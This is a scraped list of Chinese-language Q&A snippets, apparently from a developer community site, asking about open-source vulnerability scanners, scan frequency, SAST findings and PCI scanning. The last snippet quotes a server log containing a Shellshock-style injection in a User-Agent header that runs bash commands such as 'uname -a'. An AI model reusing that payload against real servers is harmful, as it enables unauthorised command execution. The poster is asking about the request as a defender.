1回答
我正在寻找将漏洞扫描器与K8s集成的选项。在创建部署时,扫描器将扫描docker图像/容器,并通过json或yaml传递结果。有没有开源的扫描器?
浏览 0提问于2020-09-29得票数 2
3回答
开源漏洞扫描器
、、
我正在寻找一个开放源码漏洞扫描器,我可以安装在我的一台机器上,并指向我的所有其他。理想情况下,我可以配置夜间扫描,在其中扫描所有其他节点,并为每个节点提供一个复合报告。
浏览 0提问于2012-07-02得票数 3
回答已采纳
2回答
我们使用Snyk作为开源依赖扫描程序。我们目前在每个拉请求上扫描易受攻击的库,这会给我们的开发人员带来开销。什么是好的开源漏洞扫描频率?它应该是每周,双周,每月还是连续?
浏览 0提问于2021-02-08得票数 1
1回答
我在intellectstorm.com为我的公司构建了几个web,我的任务是通过扫描漏洞来测试这些产品。到目前为止,我还不能确定一个好的工具;到目前为止,我使用了以下方法:内苏斯尼克托
我不能继续使用Nessus或Barracuda,因为它们不是开源的。我没有看到任何关于查找web和扫描web漏洞的文档。
浏览 0提问于2018-08-06得票数 0
1回答
我正在寻找一些开源工具来管理来自漏洞扫描的数据。我的公司使用Tenable,Mcafee漏洞管理器,acunetix,appscan进行漏洞扫描。寻找一些工具/方法来管理VA扫描。
浏览 0提问于2015-02-13得票数 1
1回答
我有一个使用50+开源软件的工具,如果这些开源软件中的任何一个被利用并提出了新的漏洞,我需要立即得到通知,我应该修补相应的软件。
那么,有没有办法做到这一点呢?我搜索了一些东西,比如CVE报告,开源威胁情报平台,但我找不到方法。
浏览 6提问于2019-04-08得票数 1
1回答
(漏洞扫描器?)项目3--基于Java swing的旧“骨头”可以轻松地集成到CI作业中。这个工具有一个很好的测试环境,有许多现成的选项(OpenVAS这里有一个25000的数据库)最好是开放源码开源解决方案好到很好的结果在领域
漏洞<e
浏览 0提问于2019-02-20得票数 2
我在Veracode平台上对我的代码进行了SAST扫描,我在Java邮件功能中发现了这个漏洞,我正在使用这个漏洞从我的应用程序发送邮件。以下是即将出现的漏洞-- CRLF序列(“CRLF注入”) (CWE ID 93)的不正确中和。请有人帮我重新调解这个问题,这样就不会再出现在扫描中了。
浏览 4提问于2019-07-01得票数 0
回答已采纳
我们目前正在构建一个符合PCI DSS Level 1的平台,该平台将仅在Elastic Beanstalk (Linux AMI)上运行一个应用服务器。我们最近与我们QSA进行了一次交谈,他们告诉我们,我们不需要内部漏洞扫描(PCI Req 11.2.1)和内部笔式测试(PCI Req 11.3.2),因为Elastic Beanstalk容器实例不能以操作方式访问和交互管理,例如,在工作人员控制下的远程管理外壳,以及没有可访问的IaaS内部基础设施,可以实际扫描漏洞。他说我们不需要这
浏览 28提问于2021-02-16得票数 0
2回答
从单元测试的角度看 :是否有任何(更喜欢开源的)工具来测试建立在ASP.NET MVC、手动或自动基础上的网站的漏洞,这些漏洞可以用于质量保证?
浏览 4提问于2013-05-12得票数 9
1回答
我是臭虫赏金平台的成员。有一些程序让黑客可以使用他们的源代码来发现漏洞。例如,他们的PHP、JS、C++或ruby代码。黑客如何净化这些代码来理解它?
黑客是如何发现漏洞的?他们需要什么工具(除了漏洞扫描器)
浏览 0提问于2018-06-16得票数 1
回答已采纳
2回答
我们目前在我们的WhiteSource DevOps管道中使用Azure Bolt任务来扫描我们的代码,以发现已知的漏洞。此任务将生成有关管道级别的报告,另外还会生成所有管道的所有漏洞的摘要报告。此摘要报告可以通过电子邮件以不同的格式导出/发送,但只能从UI 我们希望收到新漏洞的通知。假设我们当前的代码没有漏洞,所以我们希望得到通知,以防管道任务完成并发现一些新的漏洞。有没有人知道任何开源的代码漏洞扫描解决方案,可以与Azu
浏览 54提问于2021-03-23得票数 0
6回答
我正在进行一项研究与开发任务,以测试web应用程序中可能出现的安全漏洞。我想使用开源工具。我读过网络应用程序的安全测试和开源安全测试工具,发现它很有用。但是,由于它是在一年前发布的,我想得到一个最新的答复。
浏览 0提问于2014-07-22得票数 3
我开发了一个web应用程序,主要是在PHP和JavaScript中使用一些AJAX。或者,如果您知道一些代码,我可以尝试各种形式,这也可能是有帮助的!
浏览 0提问于2015-12-24得票数 -4
回答已采纳
1回答
我正在寻找一个静态代码分析工具,扫描一个web应用程序的源代码(而不是URL)的安全漏洞。到目前为止,我还没有找到一个扫描代码的工具,它只是要求粘贴网址,这不是我所看到的for.Could --请建议我使用一个“开源”工具来扫描使用“javascript”开发的web应用程序?请各位!!
浏览 0提问于2013-11-08得票数 0
我今天刚从我们的服务器上读取了日志,发现了一些IP发出的cgi请求。(我刚刚粘贴了其中的一些)。62.210.113.143 - - [29/Sep/2015:13:36:00 -0700] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 200 18 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo
浏览 0提问于2015-10-01得票数 1
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
腾讯会议
实时音视频活动推荐
腾讯云开发者
